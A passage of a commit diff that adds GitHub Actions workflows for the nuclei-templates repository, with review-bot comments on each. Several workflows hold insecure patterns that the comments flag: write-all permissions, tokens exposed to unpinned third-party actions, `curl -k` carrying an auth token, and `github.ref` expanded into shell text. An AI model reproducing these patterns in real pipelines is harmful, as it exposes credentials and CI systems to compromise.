fmt.Printf("Error unmarshalling YAML file %s: %v\n", path, err)
|
||||||
|
return err
|
||||||
|
}
|
||||||
|
if d.Info.Classification.CVSSScore == "" {
|
||||||
|
d.Info.Classification.CVSSScore = "N/A"
|
||||||
|
}
|
||||||
|
if d.Info.Classification == (Classification{}) {
|
||||||
|
d.Info.Classification.CVSSScore = "N/A"
|
||||||
|
}
|
||||||
|
fpath := strings.Replace(path, "/home/runner/work/nuclei-templates/nuclei-templates/", "", 1)
|
||||||
|
d.FilePath = fpath
|
||||||
|
|
||||||
|
data = append(data, d)
|
||||||
|
}
|
||||||
|
return nil
|
||||||
|
})
|
||||||
|
|
||||||
|
if err != nil {
|
||||||
|
fmt.Printf("Error reading directory: %v\n", err)
|
||||||
|
os.Exit(1)
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
var jsonData []byte
|
||||||
|
for _, d := range data {
|
||||||
|
temp, err := json.Marshal(d)
|
||||||
|
if err != nil {
|
||||||
|
fmt.Printf("Error marshalling JSON: %v\n", err)
|
||||||
|
os.Exit(1)
|
||||||
|
}
|
||||||
|
jsonData = append(jsonData, temp...)
|
||||||
|
jsonData = append(jsonData, byte('\n'))
|
||||||
|
}
|
||||||
|
err := ioutil.WriteFile(outputFile, jsonData, 0644)
|
||||||
|
if err != nil {
|
||||||
|
fmt.Printf("Error writing JSON data to file: %v\n", err)
|
||||||
|
os.Exit(1)
|
||||||
|
}
|
||||||
|
|
||||||
|
fmt.Println("JSON data written to", outputFile)
|
||||||
|
}
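Review bot: The repository prefix is hard-coded in `strings.Replace(path, "/home/runner/work/nuclei-templates/nuclei-templates/", "", 1)`, so `file_path` silently stays absolute on any checkout whose workspace path differs. Deriving it with `filepath.Rel` against the working directory (or the `GITHUB_WORKSPACE` value) removes that assumption. The second check `if d.Info.Classification == (Classification{})` can never be true because the block before it has already set `CVSSScore` to "N/A", and `ioutil.ReadFile`/`ioutil.WriteFile` are deprecated in favour of `os.ReadFile`/`os.WriteFile` on the Go 1.19 toolchain the workflow installs. One unparsable template also aborts the whole run, because the walk callback returns the unmarshal error; if that is intended, a comment saying so would help.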
|
|
@ -0,0 +1,31 @@
|
||||||
|
name: 🤖 issue/pr assignment
|
||||||
|
on:
|
||||||
|
pull_request:
|
||||||
|
types: [opened]
|
||||||
|
branches:
|
||||||
|
- main
|
||||||
|
issues:
|
||||||
|
types: [opened]
|
||||||
|
|
||||||
|
jobs:
|
||||||
|
build:
|
||||||
|
permissions: write-all
|
||||||
|
runs-on: ubuntu-latest
|
||||||
|
env:
|
||||||
|
ASSIGN_TASK_TOKEN: ${{ secrets.PDTEAMX_PAT }} # github personal token
|
||||||
|
steps:
|
||||||
|
- name: checkout repo content
|
||||||
|
uses: actions/checkout@v4 # checkout the repository content
|
||||||
|
- name: setup python
|
||||||
|
uses: actions/setup-python@v5
|
||||||
|
with:
|
||||||
|
python-version: '3.10' # install the python version needed
|
||||||
|
- name: install python packages
|
||||||
|
run: |
|
||||||
|
pip install requests
|
||||||
|
- name: execute python script on pr
|
||||||
|
if: ${{ github.event_name == 'pull_request' }}
|
||||||
|
run: python .github/scripts/assign_tasks.py ${{ github.event.pull_request.number }} pr ${{ secrets.GITHUB_TOKEN }}
|
||||||
|
- name: execute python script on issue opened
|
||||||
|
if: ${{ github.event_name == 'issues' }}
|
||||||
|
run: python .github/scripts/assign_tasks.py ${{ github.event.issue.number }} issue ${{ secrets.GITHUB_TOKEN }}
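Review bot: `permissions: write-all` gives the job token write access to every scope although the script only assigns issues and requests reviewers; a scoped block with `contents: read`, `issues: write` and `pull-requests: write` is enough. The job-level `ASSIGN_TASK_TOKEN: ${{ secrets.PDTEAMX_PAT }}` does not appear to be read by the script as called here (it receives `secrets.GITHUB_TOKEN` as its third argument), yet it exposes the personal access token to every step, including the unpinned `pip install requests` and the checked-out script; drop it or move it to the one step that needs it. Passing the token as a command-line argument in the two `run:` lines is better replaced by a step-level `env:` entry that the script reads.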
|
|
@ -0,0 +1,22 @@
|
||||||
|
name: 🗑️ Cache Purge
|
||||||
|
|
||||||
|
on:
|
||||||
|
push:
|
||||||
|
tags:
|
||||||
|
- '*'
|
||||||
|
workflow_dispatch:
|
||||||
|
|
||||||
|
jobs:
|
||||||
|
deploy:
|
||||||
|
runs-on: ubuntu-latest
|
||||||
|
if: github.repository == 'projectdiscovery/nuclei-templates'
|
||||||
|
steps:
|
||||||
|
# Wait for 5 minutes
|
||||||
|
- name: Wait for 2 minutes
|
||||||
|
run: sleep 120
|
||||||
|
|
||||||
|
- name: Purge cache
|
||||||
|
uses: jakejarvis/cloudflare-purge-action@master
|
||||||
|
env:
|
||||||
|
CLOUDFLARE_ZONE: ${{ secrets.CLOUDFLARE_ZONE }}
|
||||||
|
CLOUDFLARE_TOKEN: ${{ secrets.CLOUDFLARE_TOKEN }}
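Review bot: `uses: jakejarvis/cloudflare-purge-action@master` runs whatever the third-party repository's `master` branch points to at execution time, and that code receives `CLOUDFLARE_ZONE` and `CLOUDFLARE_TOKEN`. Pin the action to a full commit SHA, e.g. `uses: jakejarvis/cloudflare-purge-action@<full-commit-sha>` (placeholder), and keep the Cloudflare token limited to cache purge on that zone. The job has no `permissions:` block; `permissions: {}` would do, since no repository access is needed here. Minor: the comment says "Wait for 5 minutes" while the step name and `sleep 120` say two.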
|
|
@ -0,0 +1,45 @@
|
||||||
|
name: 📝 CVE JSON Metadata
|
||||||
|
|
||||||
|
on:
|
||||||
|
push:
|
||||||
|
branches:
|
||||||
|
- main
|
||||||
|
paths:
|
||||||
|
- '*/cves/**'
|
||||||
|
workflow_dispatch: # allows manual triggering of the workflow
|
||||||
|
|
||||||
|
jobs:
|
||||||
|
cve2json:
|
||||||
|
runs-on: ubuntu-latest
|
||||||
|
if: github.repository == 'projectdiscovery/nuclei-templates'
|
||||||
|
steps:
|
||||||
|
- uses: actions/checkout@master
|
||||||
|
- name: Set up Go
|
||||||
|
uses: actions/setup-go@v5
|
||||||
|
with:
|
||||||
|
go-version: 1.19
|
||||||
|
|
||||||
|
- name: Run YAML2JSON
|
||||||
|
id: cves
|
||||||
|
run: |
|
||||||
|
go env -w GO111MODULE=off
|
||||||
|
go get gopkg.in/yaml.v3
|
||||||
|
go run .github/scripts/yaml2json.go $GITHUB_WORKSPACE/http/cves/,$GITHUB_WORKSPACE/network/cves/ cves.json
|
||||||
|
md5sum cves.json | cut -d' ' -f1 > cves.json-checksum.txt
|
||||||
|
git status -s | wc -l | xargs -I {} echo CHANGES={} >> $GITHUB_OUTPUT
|
||||||
|
|
||||||
|
- name: Commit files
|
||||||
|
if: steps.cves.outputs.CHANGES > 0
|
||||||
|
run: |
|
||||||
|
git config --local user.email "action@github.com"
|
||||||
|
git config --local user.name "GitHub Action"
|
||||||
|
git add cves.json cves.json-checksum.txt
|
||||||
|
git commit -m "Auto Generated cves.json [$(date)] :robot:" -a
|
||||||
|
|
||||||
|
- name: Push changes
|
||||||
|
if: steps.cves.outputs.CHANGES > 0
|
||||||
|
run: |
|
||||||
|
git pull --rebase
|
||||||
|
git push origin ${{ github.ref }}
|
||||||
|
env:
|
||||||
|
GITHUB_TOKEN: ${{ secrets.GITHUB_TOKEN }}
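Review bot: This job builds from unpinned inputs and then pushes to `main`: `actions/checkout@master` follows a moving branch, and `go env -w GO111MODULE=off` followed by `go get gopkg.in/yaml.v3` fetches whatever that import path currently resolves to, with no go.sum verification. Pinning the checkout to a tag or commit SHA and adding a `go.mod`/`go.sum` for the script makes the build reproducible. `${{ github.ref }}` in `git push origin ${{ github.ref }}` is expanded into the script text before the shell runs; passing it through `env:` and using `"$GITHUB_REF"` is the safer pattern, and `"$GITHUB_OUTPUT"` should be quoted. If `cves.json-checksum.txt` is meant as an integrity check rather than a change marker, `sha256sum` is a better choice than `md5sum`. Quote `go-version: '1.19'` so that a later bump such as 1.20 is not read as the number 1.2.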
|
|
@ -0,0 +1,43 @@
|
||||||
|
name: 🥳 New Template List
|
||||||
|
|
||||||
|
on:
|
||||||
|
push:
|
||||||
|
branches:
|
||||||
|
- main
|
||||||
|
paths:
|
||||||
|
- '**.yaml'
|
||||||
|
workflow_dispatch:
|
||||||
|
|
||||||
|
jobs:
|
||||||
|
templates:
|
||||||
|
runs-on: ubuntu-latest
|
||||||
|
if: github.repository == 'projectdiscovery/nuclei-templates'
|
||||||
|
steps:
|
||||||
|
- uses: actions/checkout@master
|
||||||
|
with:
|
||||||
|
token: ${{ secrets.GITHUB_TOKEN }}
|
||||||
|
persist-credentials: false
|
||||||
|
fetch-depth: 0
|
||||||
|
|
||||||
|
- name: Generate new template list
|
||||||
|
id: new-additions
|
||||||
|
run: |
|
||||||
|
git pull
|
||||||
|
git diff --name-only --diff-filter=A $(git tag | tail -n 1) @ . | grep .yaml | tee .new-additions
|
||||||
|
|
||||||
|
- name: Commit files
|
||||||
|
run: |
|
||||||
|
git config --local user.email "bot@projectdiscovery.io"
|
||||||
|
git config --local user.name "[PDBot]"
|
||||||
|
git add .new-additions -f
|
||||||
|
git commit --allow-empty -m "Auto Generated New Template Addition List [$(date)] :robot:" -a
|
||||||
|
|
||||||
|
- name: Push changes
|
||||||
|
uses: ad-m/github-push-action@master
|
||||||
|
with:
|
||||||
|
github_token: ${{ secrets.GITHUB_TOKEN }}
|
||||||
|
branch: ${{ github.ref }}
|
||||||
|
|
||||||
|
- name: Trigger Remote Workflow with curl
|
||||||
|
run: |
|
||||||
|
curl -i -s -k -X 'POST' -H 'Host: api.github.com' -H "Authorization: token ${{ secrets.GTOKEN }}" --data-binary $'{\"ref\":\"main\"}' 'https://api.github.com/repos/projectdiscovery/early-templates/actions/workflows/reposync.yml/dispatches'
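Review bot: The `curl` call in `Trigger Remote Workflow with curl` passes `-k`, which turns off TLS certificate verification on the very request that carries `Authorization: token ${{ secrets.GTOKEN }}`, so the token is sent without checking that the peer is really api.github.com. Drop `-k` and the redundant `-H 'Host: api.github.com'`, and replace `-i` with `--fail` so an HTTP error fails the step instead of only being printed: `curl -sS --fail -X POST -H "Authorization: token $GTOKEN" ...`, with `GTOKEN: ${{ secrets.GTOKEN }}` supplied through the step's `env:`. The identical command appears in the `Sync Repositories Workflow` section further down and needs the same change.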
|
|
@ -0,0 +1,47 @@
|
||||||
|
name: 📝 Readme Update
|
||||||
|
|
||||||
|
on:
|
||||||
|
workflow_run:
|
||||||
|
workflows: ["🗒 Templates Stats"]
|
||||||
|
types:
|
||||||
|
- completed
|
||||||
|
workflow_dispatch:
|
||||||
|
|
||||||
|
jobs:
|
||||||
|
build:
|
||||||
|
runs-on: ubuntu-latest
|
||||||
|
if: github.repository == 'projectdiscovery/nuclei-templates'
|
||||||
|
steps:
|
||||||
|
- name: Install tree
|
||||||
|
run: sudo apt-get install tree -y
|
||||||
|
|
||||||
|
- name: Check out code
|
||||||
|
uses: actions/checkout@master
|
||||||
|
with:
|
||||||
|
persist-credentials: false
|
||||||
|
fetch-depth: 0
|
||||||
|
|
||||||
|
- name: Set up Python
|
||||||
|
uses: actions/setup-python@v5
|
||||||
|
with:
|
||||||
|
python-version: "3.8"
|
||||||
|
|
||||||
|
- name: Update README
|
||||||
|
id: readme-update
|
||||||
|
run: |
|
||||||
|
python .github/scripts/update-readme.py
|
||||||
|
git status -s | wc -l | xargs -I {} echo CHANGES={} >> $GITHUB_OUTPUT
|
||||||
|
|
||||||
|
- name: Commit files
|
||||||
|
if: steps.readme-update.outputs.CHANGES > 0
|
||||||
|
run: |
|
||||||
|
git config --local user.email "action@github.com"
|
||||||
|
git config --local user.name "GitHub Action"
|
||||||
|
git commit -m "Auto README Update [$(date)] :robot:" -a
|
||||||
|
|
||||||
|
- name: Push changes
|
||||||
|
if: steps.readme-update.outputs.CHANGES > 0
|
||||||
|
uses: ad-m/github-push-action@master
|
||||||
|
with:
|
||||||
|
github_token: ${{ secrets.GITHUB_TOKEN }}
|
||||||
|
branch: ${{ github.ref }}
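Review bot: `Push changes` hands `secrets.GITHUB_TOKEN` to `ad-m/github-push-action@master`, a third-party action referenced by a moving branch, so any later commit on that branch runs in this job with the token's push rights. Pin it to a full commit SHA, e.g. `uses: ad-m/github-push-action@<full-commit-sha>  # <release tag>`, and pin `actions/checkout@master` in `Check out code` the same way. The same `@master` reference is used in the New Template List, Templates Stats and WordPress Plugins - Update workflows in this commit. None of the workflows shown declare a `permissions:` block; adding `permissions:` with `contents: write` at workflow level would bound what the token can do.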
|
|
@ -0,0 +1,19 @@
|
||||||
|
name: ❄️ YAML Lint
|
||||||
|
|
||||||
|
on:
|
||||||
|
pull_request:
|
||||||
|
paths:
|
||||||
|
- '**.yaml'
|
||||||
|
workflow_dispatch:
|
||||||
|
|
||||||
|
jobs:
|
||||||
|
build:
|
||||||
|
runs-on: ubuntu-latest
|
||||||
|
steps:
|
||||||
|
- uses: actions/checkout@v4
|
||||||
|
- name: Yamllint
|
||||||
|
uses: karancode/yamllint-github-action@v2.1.1
|
||||||
|
with:
|
||||||
|
yamllint_config_filepath: .yamllint
|
||||||
|
yamllint_strict: false
|
||||||
|
yamllint_comment: true
|
|
@ -0,0 +1,49 @@
|
||||||
|
name: 📝 Template Checksum
|
||||||
|
|
||||||
|
on:
|
||||||
|
push:
|
||||||
|
branches:
|
||||||
|
- main
|
||||||
|
paths:
|
||||||
|
- '**.yaml'
|
||||||
|
workflow_dispatch: # allows manual triggering of the workflow
|
||||||
|
|
||||||
|
jobs:
|
||||||
|
checksum:
|
||||||
|
runs-on: ubuntu-latest
|
||||||
|
if: github.repository == 'projectdiscovery/nuclei-templates'
|
||||||
|
steps:
|
||||||
|
- uses: actions/checkout@v4
|
||||||
|
with:
|
||||||
|
fetch-depth: 0
|
||||||
|
|
||||||
|
- name: Set up Go
|
||||||
|
uses: actions/setup-go@v5
|
||||||
|
with:
|
||||||
|
go-version: 1.21.x
|
||||||
|
|
||||||
|
- name: install checksum generator
|
||||||
|
run: |
|
||||||
|
go install -v github.com/projectdiscovery/nuclei/v3/cmd/generate-checksum@dev
|
||||||
|
|
||||||
|
- name: generate checksum
|
||||||
|
id: checksum
|
||||||
|
run: |
|
||||||
|
generate-checksum /home/runner/work/nuclei-templates/nuclei-templates/ templates-checksum.txt
|
||||||
|
git status -s | wc -l | xargs -I {} echo CHANGES={} >> $GITHUB_OUTPUT
|
||||||
|
|
||||||
|
- name: Commit files
|
||||||
|
if: steps.checksum.outputs.CHANGES > 0
|
||||||
|
run: |
|
||||||
|
git config --local user.email "action@github.com"
|
||||||
|
git config --local user.name "GitHub Action"
|
||||||
|
git add templates-checksum.txt
|
||||||
|
git commit -am "Auto Generated Templates Checksum [$(date)] :robot:"
|
||||||
|
|
||||||
|
- name: Push changes
|
||||||
|
if: steps.checksum.outputs.CHANGES > 0
|
||||||
|
run: |
|
||||||
|
git pull --rebase
|
||||||
|
git push origin ${{ github.ref }}
|
||||||
|
env:
|
||||||
|
GITHUB_TOKEN: ${{ secrets.GITHUB_TOKEN }}
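Review bot: In `Push changes`, `git push origin ${{ github.ref }}` is expanded into the script text before the shell runs, and because `workflow_dispatch` is enabled the ref is whichever branch the run was started on, so a branch name containing shell metacharacters would be interpreted by the shell rather than passed as an argument. Pass the value through the environment and quote it: add `REF: ${{ github.ref }}` under the step's `env:` and use `git push origin "$REF"`. The same line is present in the CVE JSON Metadata, Template Sign and TemplateMan workflows in this commit. Separately, `generate-checksum@dev` in `install checksum generator` builds from a moving branch; a tagged version would keep the tool that writes `templates-checksum.txt` fixed between runs.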
|
|
@ -0,0 +1,31 @@
|
||||||
|
name: 📑 Template-DB Indexer
|
||||||
|
|
||||||
|
on:
|
||||||
|
push:
|
||||||
|
tags:
|
||||||
|
- '*'
|
||||||
|
workflow_dispatch:
|
||||||
|
|
||||||
|
jobs:
|
||||||
|
index:
|
||||||
|
runs-on: ubuntu-latest-16-cores
|
||||||
|
if: github.repository == 'projectdiscovery/nuclei-templates'
|
||||||
|
steps:
|
||||||
|
- name: Set up Go
|
||||||
|
uses: actions/setup-go@v5
|
||||||
|
with:
|
||||||
|
go-version: 1.21.x
|
||||||
|
|
||||||
|
- name: Installing Indexer
|
||||||
|
run: |
|
||||||
|
git config --global url."https://${{ secrets.ACCESS_TOKEN }}@github".insteadOf https://github
|
||||||
|
git clone https://github.com/projectdiscovery/nucleish-api.git
|
||||||
|
cd nucleish-api/cmd/generate-index/
|
||||||
|
go install
|
||||||
|
|
||||||
|
- name: Generate Index
|
||||||
|
env:
|
||||||
|
AWS_ACCESS_KEY: ${{ secrets.AWS_ACCESS_KEY }}
|
||||||
|
AWS_SECRET_KEY: ${{ secrets.AWS_SECRET_KEY }}
|
||||||
|
run: |
|
||||||
|
generate-index -mode templates
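Review bot: `Installing Indexer` writes `secrets.ACCESS_TOKEN` into the runner's global git config with a rewrite whose prefix is only `https://github`, so the token is attached to every URL that starts with that string and stays configured for the later `Generate Index` step, which also holds the AWS keys. Scope the rewrite to the one path that needs it, `git config --global url."https://${ACCESS_TOKEN}@github.com/projectdiscovery/".insteadOf "https://github.com/projectdiscovery/"` with `ACCESS_TOKEN` passed through the step's `env:`, and unset that key once `go install` has finished. The TemplateMan workflow in this commit uses the same `git config` line and would take the same fix.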
|
|
@ -0,0 +1,51 @@
|
||||||
|
name: ☑️ Template Sign
|
||||||
|
|
||||||
|
on:
|
||||||
|
push:
|
||||||
|
branches:
|
||||||
|
- main
|
||||||
|
paths:
|
||||||
|
- '**.yaml'
|
||||||
|
workflow_dispatch:
|
||||||
|
|
||||||
|
jobs:
|
||||||
|
build:
|
||||||
|
runs-on: ubuntu-latest
|
||||||
|
steps:
|
||||||
|
- uses: actions/checkout@v4
|
||||||
|
with:
|
||||||
|
fetch-depth: 0
|
||||||
|
|
||||||
|
- name: Set up Go
|
||||||
|
uses: actions/setup-go@v5
|
||||||
|
with:
|
||||||
|
go-version: 1.21.x
|
||||||
|
|
||||||
|
- name: nuclei install
|
||||||
|
run: go install -v github.com/projectdiscovery/nuclei/v3/cmd/nuclei@dev
|
||||||
|
|
||||||
|
- name: Template Sign
|
||||||
|
id: sign
|
||||||
|
run: |
|
||||||
|
nuclei -lfa -duc -sign -t /home/runner/work/nuclei-templates/nuclei-templates
|
||||||
|
nuclei -lfa -duc -t /home/runner/work/nuclei-templates/nuclei-templates
|
||||||
|
git status -s | wc -l | xargs -I {} echo CHANGES={} >> $GITHUB_OUTPUT
|
||||||
|
env:
|
||||||
|
NUCLEI_USER_CERTIFICATE: ${{ secrets.NUCLEI_USER_CERTIFICATE }}
|
||||||
|
NUCLEI_USER_PRIVATE_KEY: ${{ secrets.NUCLEI_USER_PRIVATE_KEY }}
|
||||||
|
|
||||||
|
- name: Commit files
|
||||||
|
if: steps.sign.outputs.CHANGES > 0
|
||||||
|
run: |
|
||||||
|
git config --local user.email "action@github.com"
|
||||||
|
git config --local user.name "GitHub Action"
|
||||||
|
git add cves.json cves.json-checksum.txt
|
||||||
|
git commit -m "Auto Template Signing [$(date)] :robot:" -a
|
||||||
|
|
||||||
|
- name: Push changes
|
||||||
|
if: steps.sign.outputs.CHANGES > 0
|
||||||
|
run: |
|
||||||
|
git pull --rebase
|
||||||
|
git push origin ${{ github.ref }}
|
||||||
|
env:
|
||||||
|
GITHUB_TOKEN: ${{ secrets.GITHUB_TOKEN }}
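Review bot: The `Template Sign` step exposes `NUCLEI_USER_PRIVATE_KEY` to a `nuclei` binary that `nuclei install` builds from `@dev`, a moving branch, so the code handling the signing key changes with every push to that branch. Install a tagged release instead, `go install -v github.com/projectdiscovery/nuclei/v3/cmd/nuclei@<release-tag>`. Unlike the other push-triggered workflows in this commit, this job has no `if: github.repository == 'projectdiscovery/nuclei-templates'` guard even though it hard-codes `/home/runner/work/nuclei-templates/nuclei-templates`; `$GITHUB_WORKSPACE` would not depend on the repository name. The `git add cves.json cves.json-checksum.txt` line in `Commit files` looks copied from the CVE JSON workflow and names nothing this job generates.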
|
|
@ -0,0 +1,29 @@
|
||||||
|
name: 🛠 Template Validate
|
||||||
|
|
||||||
|
on:
|
||||||
|
pull_request:
|
||||||
|
paths:
|
||||||
|
- '**.yaml'
|
||||||
|
workflow_dispatch:
|
||||||
|
|
||||||
|
jobs:
|
||||||
|
build:
|
||||||
|
runs-on: ubuntu-latest
|
||||||
|
steps:
|
||||||
|
- uses: actions/checkout@v4
|
||||||
|
with:
|
||||||
|
fetch-depth: 0
|
||||||
|
|
||||||
|
- name: Set up Go
|
||||||
|
uses: actions/setup-go@v5
|
||||||
|
with:
|
||||||
|
go-version: 1.21.x
|
||||||
|
|
||||||
|
- name: nuclei install
|
||||||
|
run: go install -v github.com/projectdiscovery/nuclei/v3/cmd/nuclei@latest
|
||||||
|
|
||||||
|
- name: Template Validation
|
||||||
|
run: |
|
||||||
|
cp -r ${{ github.workspace }} $HOME
|
||||||
|
nuclei -duc -validate -allow-local-file-access -et /home/runner/nuclei-templates/config/.git -et /home/runner/nuclei-templates/config
|
||||||
|
nuclei -duc -validate -w ./workflows -allow-local-file-access -et /home/runner/nuclei-templates/config/.git -et /home/runner/nuclei-templates/config
|
|
@ -0,0 +1,46 @@
|
||||||
|
name: 🤖 TemplateMan
|
||||||
|
|
||||||
|
on:
|
||||||
|
workflow_dispatch:
|
||||||
|
|
||||||
|
jobs:
|
||||||
|
templateman:
|
||||||
|
runs-on: ubuntu-latest
|
||||||
|
if: github.repository == 'projectdiscovery/nuclei-templates'
|
||||||
|
steps:
|
||||||
|
- uses: actions/checkout@v4
|
||||||
|
with:
|
||||||
|
fetch-depth: 0
|
||||||
|
|
||||||
|
- name: Set up Go
|
||||||
|
uses: actions/setup-go@v5
|
||||||
|
with:
|
||||||
|
go-version: 1.21.x
|
||||||
|
|
||||||
|
- name: Install TemplateMan CLI Client
|
||||||
|
run: |
|
||||||
|
git config --global url."https://${{ secrets.ACCESS_TOKEN }}@github".insteadOf https://github
|
||||||
|
git clone https://github.com/projectdiscovery/templateman.git
|
||||||
|
cd templateman/templateman-cli/cmd/tmc
|
||||||
|
go install
|
||||||
|
|
||||||
|
- name: Run TemplateMan
|
||||||
|
id: tmc
|
||||||
|
run: |
|
||||||
|
echo /home/runner/work/nuclei-templates/nuclei-templates | tmc -mr -e
|
||||||
|
git status -s | wc -l | xargs -I {} echo CHANGES={} >> $GITHUB_OUTPUT
|
||||||
|
|
||||||
|
- name: Commit files
|
||||||
|
if: steps.tmc.outputs.CHANGES > 0
|
||||||
|
run: |
|
||||||
|
git config --local user.email "action@github.com"
|
||||||
|
git config --local user.name "GitHub Action"
|
||||||
|
git commit --allow-empty -m "TemplateMan Update [$(date)] :robot:" -a
|
||||||
|
|
||||||
|
- name: Push changes
|
||||||
|
if: steps.tmc.outputs.CHANGES > 0
|
||||||
|
run: |
|
||||||
|
git pull --rebase
|
||||||
|
git push origin ${{ github.ref }}
|
||||||
|
env:
|
||||||
|
GITHUB_TOKEN: ${{ secrets.GITHUB_TOKEN }}
|
|
@ -0,0 +1,58 @@
|
||||||
|
name: 🗒 Templates Stats
|
||||||
|
|
||||||
|
on:
|
||||||
|
push:
|
||||||
|
tags:
|
||||||
|
- '*'
|
||||||
|
workflow_dispatch:
|
||||||
|
|
||||||
|
jobs:
|
||||||
|
build:
|
||||||
|
runs-on: ubuntu-latest
|
||||||
|
steps:
|
||||||
|
- uses: actions/checkout@v4
|
||||||
|
with:
|
||||||
|
fetch-depth: 0
|
||||||
|
|
||||||
|
- name: Set up Go
|
||||||
|
uses: actions/setup-go@v5
|
||||||
|
with:
|
||||||
|
go-version: 1.19
|
||||||
|
|
||||||
|
- name: Installing Template Stats
|
||||||
|
run: |
|
||||||
|
go install github.com/projectdiscovery/templates-stats@main
|
||||||
|
shell: bash
|
||||||
|
|
||||||
|
- name: Markdown Stats
|
||||||
|
run: |
|
||||||
|
templates-stats -output TEMPLATES-STATS.md -path /home/runner/work/nuclei-templates/nuclei-templates/
|
||||||
|
shell: bash
|
||||||
|
|
||||||
|
- name: JSON Stats
|
||||||
|
run: |
|
||||||
|
templates-stats -output TEMPLATES-STATS.json -json -path /home/runner/work/nuclei-templates/nuclei-templates/
|
||||||
|
shell: bash
|
||||||
|
|
||||||
|
- name: Top 10 Stats
|
||||||
|
run: |
|
||||||
|
templates-stats -output TOP-10.md -top 10 -path /home/runner/work/nuclei-templates/nuclei-templates/
|
||||||
|
shell: bash
|
||||||
|
|
||||||
|
- name: Get statistical changes
|
||||||
|
id: stats
|
||||||
|
run: git status -s | wc -l | xargs -I {} echo CHANGES={} >> $GITHUB_OUTPUT
|
||||||
|
|
||||||
|
- name: Commit files
|
||||||
|
if: steps.stats.outputs.CHANGES > 0
|
||||||
|
run: |
|
||||||
|
git add TEMPLATES-STATS.*
|
||||||
|
git add TOP-10.md
|
||||||
|
git config --local user.email "action@github.com"
|
||||||
|
git config --local user.name "GitHub Action"
|
||||||
|
git commit -m "Auto Generated Templates Stats [$(date)] :robot:" -a
|
||||||
|
|
||||||
|
- name: Push changes
|
||||||
|
uses: ad-m/github-push-action@master
|
||||||
|
with:
|
||||||
|
github_token: ${{ secrets.GITHUB_TOKEN }}
|
|
@ -0,0 +1,58 @@
|
||||||
|
name: Sync Repositories Workflow
|
||||||
|
on:
|
||||||
|
push:
|
||||||
|
paths:
|
||||||
|
- '.new-additions'
|
||||||
|
- 'http/cves/2015/CVE-2015-2794.yaml'
|
||||||
|
- 'http/cves/2023/CVE-2023-42343.yaml'
|
||||||
|
- 'http/cves/2023/CVE-2023-46574.yaml'
|
||||||
|
- 'http/exposures/docker-daemon-exposed.yaml'
|
||||||
|
- 'http/token-spray/api-openai.yaml'
|
||||||
|
- 'http/vulnerabilities/ruijie/ruijie-nmc-sync-rce.yaml'
|
||||||
|
- 'http/vulnerabilities/ruijie/ruijie-rg-eg-web-mis-rce.yaml'
|
||||||
|
- 'http/vulnerabilities/yonyou/yonyou-ksoa-dept-sqli.yaml'
|
||||||
|
- 'cloud/enum/aws-app-enum.yaml'
|
||||||
|
- 'cloud/enum/aws-s3-bucket-enum.yaml'
|
||||||
|
- 'cloud/enum/azure-db-enum.yaml'
|
||||||
|
- 'cloud/enum/azure-vm-cloud-enum.yaml'
|
||||||
|
- 'cloud/enum/azure-website-enum.yaml'
|
||||||
|
- 'cloud/enum/gcp-app-engine-enum.yaml'
|
||||||
|
- 'cloud/enum/gcp-bucket-enum.yaml'
|
||||||
|
- 'cloud/enum/gcp-firebase-app-enum.yaml'
|
||||||
|
- 'cloud/enum/gcp-firebase-rtdb-enum.yaml'
|
||||||
|
- 'http/cves/2023/CVE-2023-41109.yaml'
|
||||||
|
- 'network/misconfig/erlang-daemon.yaml'
|
||||||
|
- 'code/cves/2019/CVE-2019-14287.yaml'
|
||||||
|
- 'code/cves/2021/CVE-2021-3156.yaml'
|
||||||
|
- 'http/cves/2020/CVE-2020-12124.yaml'
|
||||||
|
- 'http/cves/2023/CVE-2023-50968.yaml'
|
||||||
|
- 'http/cves/2023/CVE-2023-51467.yaml'
|
||||||
|
- 'http/misconfiguration/cookies-without-httponly.yaml'
|
||||||
|
- 'http/misconfiguration/php/php-composer-binary.yaml'
|
||||||
|
- 'http/vulnerabilities/dahua/dahua-icc-backdoor-user.yaml'
|
||||||
|
- 'http/cves/2023/CVE-2023-44353.yaml'
|
||||||
|
- 'http/technologies/cisco-asa-detect.yaml'
|
||||||
|
- 'http/vulnerabilities/dlink/dlink-netgear-xss.yaml'
|
||||||
|
- 'http/exposed-panels/goodjob-dashboard.yaml'
|
||||||
|
- 'http/exposed-panels/onlyoffice-login-panel.yaml'
|
||||||
|
- 'http/cves/2023/CVE-2023-6379.yaml'
|
||||||
|
- 'http/misconfiguration/apache/apache-server-status.yaml'
|
||||||
|
- 'http/osint/piratebay.yaml'
|
||||||
|
- 'javascript/network/smb/smb-anonymous-access.yaml'
|
||||||
|
- 'javascript/network/smb/smb-shares.yaml'
|
||||||
|
- 'javascript/network/smb/smb-signing-not-required.yaml'
|
||||||
|
- 'javascript/network/smb/smb2-capabilities.yaml'
|
||||||
|
- 'http/cves/2023/CVE-2023-6623.yaml'
|
||||||
|
- 'http/cves/2024/CVE-2024-0352.yaml'
|
||||||
|
- 'http/default-logins/camunda/camunda-default-login.yaml'
|
||||||
|
- 'http/cves/2023/CVE-2023-50917.yaml'
|
||||||
|
- 'http/misconfiguration/cookies-without-httponly-secure.yaml'
|
||||||
|
- 'http/vulnerabilities/wanhu/wanhuoa-downloadservlet-lfi.yaml'
|
||||||
|
workflow_dispatch:
|
||||||
|
jobs:
|
||||||
|
triggerRemoteWorkflow:
|
||||||
|
runs-on: ubuntu-latest
|
||||||
|
steps:
|
||||||
|
- name: Trigger Remote Workflow with curl
|
||||||
|
run: |
|
||||||
|
curl -i -s -k -X 'POST' -H 'Host: api.github.com' -H "Authorization: token ${{ secrets.GTOKEN }}" --data-binary $'{\"ref\":\"main\"}' 'https://api.github.com/repos/projectdiscovery/early-templates/actions/workflows/reposync.yml/dispatches'
|
|
@ -0,0 +1,43 @@
|
||||||
|
name: ✨ WordPress Plugins - Update
|
||||||
|
|
||||||
|
on:
|
||||||
|
workflow_dispatch:
|
||||||
|
|
||||||
|
jobs:
|
||||||
|
Update:
|
||||||
|
runs-on: ubuntu-latest
|
||||||
|
steps:
|
||||||
|
- name: Check out repository code
|
||||||
|
uses: actions/checkout@v4
|
||||||
|
with:
|
||||||
|
persist-credentials: false # otherwise, the token used is the GITHUB_TOKEN, instead of your personal token
|
||||||
|
fetch-depth: 0 # otherwise, you will failed to push refs to dest repo
|
||||||
|
|
||||||
|
- name: Install Python3
|
||||||
|
uses: actions/setup-python@v5
|
||||||
|
with:
|
||||||
|
python-version: "3.10"
|
||||||
|
- run: |
|
||||||
|
python -m pip install --upgrade pip
|
||||||
|
pip install -r .github/scripts/wordpress-plugins-update-requirements.txt
|
